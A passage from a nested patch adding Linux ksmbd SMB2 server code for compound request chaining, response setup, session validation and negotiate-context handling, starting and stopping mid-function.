++		work->compound_pfid = ((struct smb2_create_rsp *)rsp)->PersistentFileId;
++		work->compound_sid = le64_to_cpu(rsp->SessionId);
++	}
++
++	len = get_rfc1002_len(work->response_buf) - work->next_smb2_rsp_hdr_off;
++	next_hdr_offset = le32_to_cpu(req->NextCommand);
++
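++	/* Pad the previous response out to an 8-byte boundary; NextCommand
++	 * carries the aligned length so the client can locate the next
++	 * response header.
++	 */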
++	new_len = ALIGN(len, 8);
++	inc_rfc1001_len(work->response_buf,
++			sizeof(struct smb2_hdr) + new_len - len);
++	rsp->NextCommand = cpu_to_le32(new_len);
++
++	work->next_smb2_rcv_hdr_off += next_hdr_offset;
++	work->next_smb2_rsp_hdr_off += new_len;
++	ksmbd_debug(SMB,
++		    "Compound req new_len = %d rcv off = %d rsp off = %d\n",
++		    new_len, work->next_smb2_rcv_hdr_off,
++		    work->next_smb2_rsp_hdr_off);
++
++	rsp_hdr = ksmbd_resp_buf_next(work);
++	rcv_hdr = ksmbd_req_buf_next(work);
++
++	if (!(rcv_hdr->Flags & SMB2_FLAGS_RELATED_OPERATIONS)) {
++		ksmbd_debug(SMB, "related flag should be set\n");
++		work->compound_fid = KSMBD_NO_FID;
++		work->compound_pfid = KSMBD_NO_FID;
++	}
++	memset((char *)rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->Command = rcv_hdr->Command;
++
++	/*
++	 * The message is a response; we don't grant the oplock yet.
++	 */
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR |
++				SMB2_FLAGS_RELATED_OPERATIONS);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = rcv_hdr->MessageId;
++	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
++	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
++	rsp_hdr->SessionId = rcv_hdr->SessionId;
++	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
++}
++
++/**
++ * is_chained_smb2_message() - check for chained command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      true if chained request, otherwise false
++ */
++bool is_chained_smb2_message(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	unsigned int len, next_cmd;
++
++	if (hdr->ProtocolId != SMB2_PROTO_NUMBER)
++		return false;
++
++	hdr = ksmbd_req_buf_next(work);
++	next_cmd = le32_to_cpu(hdr->NextCommand);
++	if (next_cmd > 0) {
++		if ((u64)work->next_smb2_rcv_hdr_off + next_cmd +
++			__SMB2_HEADER_STRUCTURE_SIZE >
++		    get_rfc1002_len(work->request_buf)) {
++			pr_err("next command(%u) offset exceeds smb msg size\n",
++			       next_cmd);
++			return false;
++		}
++
++		if ((u64)get_rfc1002_len(work->response_buf) + MAX_CIFS_SMALL_BUFFER_SIZE >
++		    work->response_sz) {
++			pr_err("next response offset exceeds response buffer size\n");
++			return false;
++		}
++
++		ksmbd_debug(SMB, "got SMB2 chained command\n");
++		init_chained_smb2_rsp(work);
++		return true;
++	} else if (work->next_smb2_rcv_hdr_off) {
++		/*
++		 * This is the last request in the chained command;
++		 * align the response to an 8-byte boundary.
++		 */
++		len = ALIGN(get_rfc1002_len(work->response_buf), 8);
++		len = len - get_rfc1002_len(work->response_buf);
++		if (len) {
++			ksmbd_debug(SMB, "padding len %u\n", len);
++			inc_rfc1001_len(work->response_buf, len);
++			if (work->aux_payload_sz)
++				work->aux_payload_sz += len;
++		}
++	}
++	return false;
++}
++
++/**
++ * init_smb2_rsp_hdr() - initialize smb2 response
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0
++ */
++int init_smb2_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb2_hdr *rsp_hdr = smb2_get_msg(work->response_buf);
++	struct smb2_hdr *rcv_hdr = smb2_get_msg(work->request_buf);
++	struct ksmbd_conn *conn = work->conn;
++
++	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(conn->vals->header_size);
++	rsp_hdr->ProtocolId = rcv_hdr->ProtocolId;
++	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
++	rsp_hdr->Command = rcv_hdr->Command;
++
++	/*
++	 * The message is a response; we don't grant the oplock yet.
++	 */
++	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
++	rsp_hdr->NextCommand = 0;
++	rsp_hdr->MessageId = rcv_hdr->MessageId;
++	rsp_hdr->Id.SyncId.ProcessId = rcv_hdr->Id.SyncId.ProcessId;
++	rsp_hdr->Id.SyncId.TreeId = rcv_hdr->Id.SyncId.TreeId;
++	rsp_hdr->SessionId = rcv_hdr->SessionId;
++	memcpy(rsp_hdr->Signature, rcv_hdr->Signature, 16);
++
++	work->syncronous = true;
++	if (work->async_id) {
++		ksmbd_release_id(&conn->async_ida, work->async_id);
++		work->async_id = 0;
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_allocate_rsp_buf() - allocate smb2 response buffer
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++int smb2_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr = smb2_get_msg(work->request_buf);
++	size_t small_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++	size_t large_sz = small_sz + work->conn->vals->max_trans_size;
++	size_t sz = small_sz;
++	int cmd = le16_to_cpu(hdr->Command);
++
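++	/* Commands that may return large payloads get a response buffer
++	 * sized for max_trans_size; everything else uses the small buffer.
++	 */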
++	if (cmd == SMB2_IOCTL_HE || cmd == SMB2_QUERY_DIRECTORY_HE)
++		sz = large_sz;
++
++	if (cmd == SMB2_QUERY_INFO_HE) {
++		struct smb2_query_info_req *req;
++
++		req = smb2_get_msg(work->request_buf);
++		if ((req->InfoType == SMB2_O_INFO_FILE &&
++		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
++		     req->FileInfoClass == FILE_ALL_INFORMATION)) ||
++		    req->InfoType == SMB2_O_INFO_SECURITY)
++			sz = large_sz;
++	}
++
++	/* allocate large response buf for chained commands */
++	if (le32_to_cpu(hdr->NextCommand) > 0)
++		sz = large_sz;
++
++	work->response_buf = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++	if (!work->response_buf)
++		return -ENOMEM;
++
++	work->response_sz = sz;
++	return 0;
++}
++
++/**
++ * smb2_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_check_user_session(struct ksmbd_work *work)
++{
++	struct smb2_hdr *req_hdr = smb2_get_msg(work->request_buf);
++	struct ksmbd_conn *conn = work->conn;
++	unsigned int cmd = conn->ops->get_cmd_val(work);
++	unsigned long long sess_id;
++
++	/*
++	 * The SMB2_ECHO, SMB2_NEGOTIATE and SMB2_SESSION_SETUP commands do
++	 * not require a session id, so there is no need to validate the
++	 * user session for these commands.
++	 */
++	if (cmd == SMB2_ECHO_HE || cmd == SMB2_NEGOTIATE_HE ||
++	    cmd == SMB2_SESSION_SETUP_HE)
++		return 0;
++
++	if (!ksmbd_conn_good(conn))
++		return -EIO;
++
++	sess_id = le64_to_cpu(req_hdr->SessionId);
++
++	/*
++	 * If the request is not the first in a compound request,
++	 * just validate the session id in the header against work->sess->id.
++	 */
++	if (work->next_smb2_rcv_hdr_off) {
++		if (!work->sess) {
++			pr_err("The first operation in the compound does not have sess\n");
++			return -EINVAL;
++		}
++		if (work->sess->id != sess_id) {
++			pr_err("session id(%llu) is different with the first operation(%lld)\n",
++					sess_id, work->sess->id);
++			return -EINVAL;
++		}
++		return 1;
++	}
++
++	/* Check for validity of user session */
++	work->sess = ksmbd_session_lookup_all(conn, sess_id);
++	if (work->sess)
++		return 1;
++	ksmbd_debug(SMB, "Invalid user session, Uid %llu\n", sess_id);
++	return -ENOENT;
++}
++
++static void destroy_previous_session(struct ksmbd_conn *conn,
++				     struct ksmbd_user *user, u64 id)
++{
++	struct ksmbd_session *prev_sess = ksmbd_session_lookup_slowpath(id);
++	struct ksmbd_user *prev_user;
++	struct channel *chann;
++	long index;
++
++	if (!prev_sess)
++		return;
++
++	prev_user = prev_sess->user;
++
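++	/* Only the same user, proven by a matching name and passkey, may
++	 * expire a previous session; otherwise leave it untouched.
++	 */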
++	if (!prev_user ||
++	    strcmp(user->name, prev_user->name) ||
++	    user->passkey_sz != prev_user->passkey_sz ||
++	    memcmp(user->passkey, prev_user->passkey, user->passkey_sz))
++		return;
++
++	prev_sess->state = SMB2_SESSION_EXPIRED;
++	xa_for_each(&prev_sess->ksmbd_chann_list, index, chann)
++		ksmbd_conn_set_exiting(chann->conn);
++}
++
++/**
++ * smb2_get_name() - get filename string from the on-the-wire smb format
++ * @src:	source buffer
++ * @maxlen:	maxlen of source string
++ * @local_nls:	nls_table pointer
++ *
++ * Return:      matching converted filename on success, otherwise error ptr
++ */
++static char *
++smb2_get_name(const char *src, const int maxlen, struct nls_table *local_nls)
++{
++	char *name;
++
++	name = smb_strndup_from_utf16(src, maxlen, 1, local_nls);
++	if (IS_ERR(name)) {
++		pr_err("failed to get name %ld\n", PTR_ERR(name));
++		return name;
++	}
++
++	ksmbd_conv_path_to_unix(name);
++	ksmbd_strip_last_slash(name);
++	return name;
++}
++
++int setup_async_work(struct ksmbd_work *work, void (*fn)(void **), void **arg)
++{
++	struct smb2_hdr *rsp_hdr;
++	struct ksmbd_conn *conn = work->conn;
++	int id;
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	rsp_hdr->Flags |= SMB2_FLAGS_ASYNC_COMMAND;
++
++	id = ksmbd_acquire_async_msg_id(&conn->async_ida);
++	if (id < 0) {
++		pr_err("Failed to alloc async message id\n");
++		return id;
++	}
++	work->syncronous = false;
++	work->async_id = id;
++	rsp_hdr->Id.AsyncId = cpu_to_le64(id);
++
++	ksmbd_debug(SMB,
++		    "Send interim Response to inform async request id : %d\n",
++		    work->async_id);
++
++	work->cancel_fn = fn;
++	work->cancel_argv = arg;
++
++	if (list_empty(&work->async_request_entry)) {
++		spin_lock(&conn->request_lock);
++		list_add_tail(&work->async_request_entry, &conn->async_requests);
++		spin_unlock(&conn->request_lock);
++	}
++
++	return 0;
++}
++
++void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status)
++{
++	struct smb2_hdr *rsp_hdr;
++
++	rsp_hdr = smb2_get_msg(work->response_buf);
++	smb2_set_err_rsp(work);
++	rsp_hdr->Status = status;
++
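++	/* multiRsp marks this as an interim reply: write it out, then clear
++	 * the flag and status so the final response can reuse the buffer.
++	 */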
++	work->multiRsp = 1;
++	ksmbd_conn_write(work);
++	rsp_hdr->Status = 0;
++	work->multiRsp = 0;
++}
++
++static __le32 smb2_get_reparse_tag_special_file(umode_t mode)
++{
++	if (S_ISDIR(mode) || S_ISREG(mode))
++		return 0;
++
++	if (S_ISLNK(mode))
++		return IO_REPARSE_TAG_LX_SYMLINK_LE;
++	else if (S_ISFIFO(mode))
++		return IO_REPARSE_TAG_LX_FIFO_LE;
++	else if (S_ISSOCK(mode))
++		return IO_REPARSE_TAG_AF_UNIX_LE;
++	else if (S_ISCHR(mode))
++		return IO_REPARSE_TAG_LX_CHR_LE;
++	else if (S_ISBLK(mode))
++		return IO_REPARSE_TAG_LX_BLK_LE;
++
++	return 0;
++}
++
++/**
++ * smb2_get_dos_mode() - get file mode in dos format from unix mode
++ * @stat:	kstat containing file mode
++ * @attribute:	attribute flags
++ *
++ * Return:      converted dos mode
++ */
++static int smb2_get_dos_mode(struct kstat *stat, int attribute)
++{
++	int attr = 0;
++
++	if (S_ISDIR(stat->mode)) {
++		attr = FILE_ATTRIBUTE_DIRECTORY |
++			(attribute & (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM));
++	} else {
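++		/* The mask 0x00005137 covers FILE_ATTRIBUTE_READONLY, HIDDEN,
++		 * SYSTEM, DIRECTORY, ARCHIVE, TEMPORARY, OFFLINE and
++		 * ENCRYPTED; DIRECTORY is cleared again just below.
++		 */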
++		attr = (attribute & 0x00005137) | FILE_ATTRIBUTE_ARCHIVE;
++		attr &= ~(FILE_ATTRIBUTE_DIRECTORY);
++		if (S_ISREG(stat->mode) && (server_conf.share_fake_fscaps &
++				FILE_SUPPORTS_SPARSE_FILES))
++			attr |= FILE_ATTRIBUTE_SPARSE_FILE;
++
++		if (smb2_get_reparse_tag_special_file(stat->mode))
++			attr |= FILE_ATTRIBUTE_REPARSE_POINT;
++	}
++
++	return attr;
++}
++
++static void build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt,
++			       __le16 hash_id)
++{
++	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(38);
++	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
++	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
++	pneg_ctxt->HashAlgorithms = hash_id;
++}
++
++static void build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt,
++			       __le16 cipher_type)
++{
++	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(4);
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->CipherCount = cpu_to_le16(1);
++	pneg_ctxt->Ciphers[0] = cipher_type;
++}
++
++static void build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt,
++				   __le16 comp_algo)
++{
++	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
++			- sizeof(struct smb2_neg_context));
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->Flags = cpu_to_le32(0);
++	pneg_ctxt->CompressionAlgorithms[0] = comp_algo;
++}
++
++static void build_sign_cap_ctxt(struct smb2_signing_capabilities *pneg_ctxt,
++				__le16 sign_algo)
++{
++	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16((sizeof(struct smb2_signing_capabilities) + 2)
++			- sizeof(struct smb2_neg_context));
++	pneg_ctxt->Reserved = cpu_to_le32(0);
++	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->SigningAlgorithms[0] = sign_algo;
++}
++
++static void build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
++	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	pneg_ctxt->Name[0] = 0x93;
++	pneg_ctxt->Name[1] = 0xAD;
++	pneg_ctxt->Name[2] = 0x25;
++	pneg_ctxt->Name[3] = 0x50;
++	pneg_ctxt->Name[4] = 0x9C;
++	pneg_ctxt->Name[5] = 0xB4;
++	pneg_ctxt->Name[6] = 0x11;
++	pneg_ctxt->Name[7] = 0xE7;
++	pneg_ctxt->Name[8] = 0xB4;
++	pneg_ctxt->Name[9] = 0x23;
++	pneg_ctxt->Name[10] = 0x83;
++	pneg_ctxt->Name[11] = 0xDE;
++	pneg_ctxt->Name[12] = 0x96;
++	pneg_ctxt->Name[13] = 0x8B;
++	pneg_ctxt->Name[14] = 0xCD;
++	pneg_ctxt->Name[15] = 0x7C;
++}
++
++static void assemble_neg_contexts(struct ksmbd_conn *conn,
++				  struct smb2_negotiate_rsp *rsp,
++				  void *smb2_buf_len)
++{
++	char *pneg_ctxt = (char *)rsp +
++			le32_to_cpu(rsp->NegotiateContextOffset);
++	int neg_ctxt_cnt = 1;
++	int ctxt_size;
++
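++	/* Contexts are packed back to back, each rounded up to an 8-byte
++	 * boundary before the next one; ctxt_size accumulates the total
++	 * that is finally added to the RFC1001 length.
++	 */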
++	ksmbd_debug(SMB,
++		    "assemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
++	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt,
++			   conn->preauth_info->Preauth_HashId);
++	rsp->NegotiateContextCount = cpu_to_le16(neg_ctxt_cnt);
++	inc_rfc1001_len(smb2_buf_len, AUTH_GSS_PADDING);
++	ctxt_size = sizeof(struct smb2_preauth_neg_context);
++	/* Round to 8 byte boundary */
++	pneg_ctxt += round_up(sizeof(struct smb2_preauth_neg_context), 8);
++
++	if (conn->cipher_type) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_ENCRYPTION_CAPABILITIES context\n");
++		build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt,
++				   conn->cipher_type);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
++		/* Round to 8 byte boundary */
++		pneg_ctxt +=
++			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
++				 8);
++	}
++
++	if (conn->compress_algorithm) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
++		/* Temporarily set to SMB3_COMPRESS_NONE */
++		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
++				       conn->compress_algorithm);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
++		/* Round to 8 byte boundary */
++		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
++				      8);
++	}
++
++	if (conn->posix_ext_supported) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
++		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_posix_neg_context);
++		/* Round to 8 byte boundary */
++		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
++	}
++
++	if (conn->signing_negotiated) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
++		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
++				    conn->signing_algorithm);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
++	}
++
++	inc_rfc1001_len(smb2_buf_len, ctxt_size);
++}
++
++static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int ctxt_len)
++{
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes an SMB311_SALT_SIZE Salt,
++	 * which may not be present. Only check for the HashAlgorithms[1]
++	 * field that is actually used.
++	 */
++	if (ctxt_len <
++	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
++
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
++}
++
++static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
++				struct smb2_encryption_neg_context *pneg_ctxt,
++				int ctxt_len)
++{
++	int cph_cnt;
++	int i, cphs_size;
++
++	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
++		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
++		return;
++	}
++
++	conn->cipher_type = 0;
++
++	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
++	cphs_size = cph_cnt * sizeof(__le16);
++
++	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
++	    ctxt_len) {
++		pr_err("Invalid cipher count(%d)\n", cph_cnt);
++		return;
++	}
++
++	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
++		return;
++
++	for (i = 0; i < cph_cnt; i++) {
++		if (pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_GCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_CCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_CCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_GCM) {
++			ksmbd_debug(SMB, "Cipher ID = 0x%x\n",
++				    pneg_ctxt->Ciphers[i]);
++			conn->cipher_type = pneg_ctxt->Ciphers[i];
++			break;
++		}
++	}
++}
++
++/**
++ * smb3_encryption_negotiated() - checks if server and client agreed on enabling encryption
++ * @conn:	smb connection
++ *
++ * Return:	true if connection should be encrypted, else false
++ */
++bool smb3_encryption_negotiated(struct ksmbd_conn *conn)
++{
++	if (!conn->ops->generate_encryptionkey)
++		return false;
++
++	/*
++	 * SMB 3.0 and 3.0.2 dialects use the SMB2_GLOBAL_CAP_ENCRYPTION flag.
++	 * SMB 3.1.1 uses the cipher_type field.
++	 */
++	return (conn->vals->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION) ||
++	    conn->cipher_type;
++}
++
++static void decode_compress_ctxt(struct ksmbd_conn *conn,
++				 struct smb2_compression_capabilities_context *pneg_ctxt)
++{
++	conn->compress_algorithm = SMB3_COMPRESS_NONE;
++}
++
++static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
++				 struct smb2_signing_capabilities *pneg_ctxt,
++				 int ctxt_len)
++{
++	int sign_algo_cnt;
++	int i, sign_algos_size;
++
++	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
++		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
++		return;
++	}
++
++	conn->signing_negotiated = false;
++	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
++	sign_algos_size = sign_algo_cnt * sizeof(__le16);
++
++	if (sizeof(struct smb2_signing_capabilities) + sign_algos_size >
++	    ctxt_len) {
++		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
++		return;
++	}
++
++	for (i = 0; i < sign_algo_cnt; i++) {
++		if (pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_HMAC_SHA256_LE ||
++		    pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_AES_CMAC_LE) {
++			ksmbd_debug(SMB, "Signing Algorithm ID = 0x%x\n",
++				    pneg_ctxt->SigningAlgorithms[i]);
++			conn->signing_negotiated = true;
++			conn->signing_algorithm =
++				pneg_ctxt->SigningAlgorithms[i];
++			break;
++		}
++	}
++}
++
++static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
++				      struct smb2_negotiate_req *req,
++				      unsigned int len_of_smb)
++{
++	/* +4 is to account for the RFC1001 len field */
++	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
++	int i = 0, len_of_ctxts;
++	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
++	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
++	__le32 status = STATUS_INVALID_PARAMETER;
++
++	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
++	if (len_of_smb <= offset) {
++		ksmbd_debug(SMB, "Invalid response: negotiate context offset\n");
++		return status;
++	}
++
++	len_of_ctxts = len_of_smb - offset;
++
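++	/* On the first pass, offset is the distance from the start of the
++	 * request to the first context; afterwards it is the 8-byte-aligned
++	 * length of the previous context.
++	 */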
++	while (i++ < neg_ctxt_cnt) {
++		int clen, ctxt_len;
++
++		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
++			break;
++
++		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
++		clen = le16_to_cpu(pctx->DataLength);
++		ctxt_len = clen + sizeof(struct smb2_neg_context);
++
++		if (ctxt_len > len_of_ctxts)
++			break;
++
++		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
++			if (conn->preauth_info->Preauth_HashId)
++				break;
++
++			status = decode_preauth_ctxt(conn,
++						     (struct smb2_preauth_neg_context *)pctx,
++						     ctxt_len);
++			if (status != STATUS_SUCCESS)
++				break;
++		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_ENCRYPTION_CAPABILITIES context\n");
++			if (conn->cipher_type)
++				break;
++
++			decode_encrypt_ctxt(conn,
++					    (struct smb2_encryption_neg_context *)pctx,
++					    ctxt_len);
++		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
++			if (conn->compress_algorithm)
++				break;
++
++			decode_compress_ctxt(conn,
++					     (struct smb2_compression_capabilities_context *)pctx);
++		} else if (pctx->ContextType == SMB2_NETNAME_NEGOTIATE_CONTEXT_ID) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_NETNAME_NEGOTIATE_CONTEXT_ID context\n");
++		} else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
++			conn->posix_ext_supported = true;
++		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
++
++			decode_sign_cap_ctxt(conn,
++					     (struct smb2_signing_capabilities *)pctx,
++					     ctxt_len);
++		}
++
++		/* offsets must be 8 byte aligned */
++		offset = (ctxt_len + 7) & ~0x7;
++		len_of_ctxts -= offset;
++	}
++	return status;
++}
++
++/**
++ * smb2_handle_negotiate() - handler for smb2 negotiate command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++int smb2_handle_negotiate(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
++	int rc = 0;
++	unsigned int smb2_buf_len, smb2_neg_size;
++	__le32 status;
++
++	ksmbd_debug(SMB, "Received negotiate request\n");
++	conn->need_neg = false;
++	if (ksmbd_conn_good(conn)) {
++		pr_err("conn->tcp_status is already in CifsGood State\n");
++		work->send_no_response = 1;
++		return rc;
++	}
++
++	smb2_buf_len = get_rfc1002_len(work->request_buf);
++	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
++	if (smb2_neg_size > smb2_buf_len) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		rc = -EINVAL;
++		goto err_out;
++	}
++
++	if (req->DialectCount == 0) {
++		pr_err("malformed packet\n");
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		rc = -EINVAL;
++		goto err_out;
++	}
++
++	if (conn->dialect == SMB311_PROT_ID) {
++		unsigned int nego_ctxt_off = le32_to_cpu(req->NegotiateContextOffset);
++
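++		/* Both the dialect array and the negotiate contexts must fit
++		 * inside the request: contexts start at nego_ctxt_off, after
++		 * the fixed header and the dialect list.
++		 */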
++		if (smb2_buf_len < nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++
++		if (smb2_neg_size > nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++	} else {
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    smb2_buf_len) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++	}
++
++	conn->cli_cap = le32_to_cpu(req->Capabilities);
++	switch (conn->dialect) {
++	case SMB311_PROT_ID:
++		conn->preauth_info =
++			kzalloc(sizeof(struct preauth_integrity_info),
++				GFP_KERNEL);
++		if (!conn->preauth_info) {
++			rc = -ENOMEM;
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			goto err_out;
++		}
++
++		status = deassemble_neg_contexts(conn, req,
++						 get_rfc1002_len(work->request_buf));
++		if (status != STATUS_SUCCESS) {
++			pr_err("deassemble_neg_contexts error(0x%x)\n",
++			       status);
++			rsp->hdr.Status = status;
++			rc = -EINVAL;
++			kfree(conn->preauth_info);
++			conn->preauth_info = NULL;
++			goto err_out;
++		}
++
++		rc = init_smb3_11_server(conn);
++		if (rc < 0) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
